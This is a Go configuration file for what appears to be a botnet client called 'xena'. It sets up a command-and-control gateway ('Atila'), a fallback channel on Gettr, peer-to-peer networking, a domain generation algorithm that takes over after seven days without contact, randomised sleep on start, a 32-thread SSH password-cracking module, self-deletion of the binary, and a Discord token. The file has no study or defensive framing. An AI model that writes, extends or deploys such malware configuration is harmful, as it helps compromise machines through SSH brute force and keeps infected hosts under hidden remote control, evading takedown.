package config

import (
	"crypto/rsa"
	"xena/modules"
)

// RENAME INTO: env.go

// Main loop configuration.
var MaxLoopWait int = 10
var MinLoopWait int = 5

// Atila is a back-end command & control server.
var GatewayHost string = "http://localhost:60606"

// Trusted public key.
var TrustedPublicKeyPEM string = "-----BEGIN PUBLIC KEY-----\n1\n2\n3\n4\n5\n6\n7\n8\n9\n10\n11\n12\n-----END PUBLIC KEY-----\n"
var TrustedPublicKey *rsa.PublicKey = modules.ImportPEMPublicKey(TrustedPublicKeyPEM)

// Gettr fallback channel configuration.
var GettrProfileName string = ""

// Peer 2 Peer configuration.
var PeerPort string = "6006"

// Domain Generation Algorithm configuration.
var DgaSeed = 215

// DGA should kick in after X amount of days since the last successful contact with Atila. (cnc)
var DgaAfterDays = 7

// Sleep on start.
var Hybernate bool = false

// In minutes:
var HybernateMin int = 10
var HybernateMax int = 15

// SSH Cracker configuration.

// Enables or disables the SSH cracking.
var EnableSshCracker bool = true

// A number of GO threads which will run the crackers.
var SshThreads int = 32

// Delete its own binary file.
var RemoveSelf bool = false

var DiscordEnabled bool = false
var DiscordToken string = ""
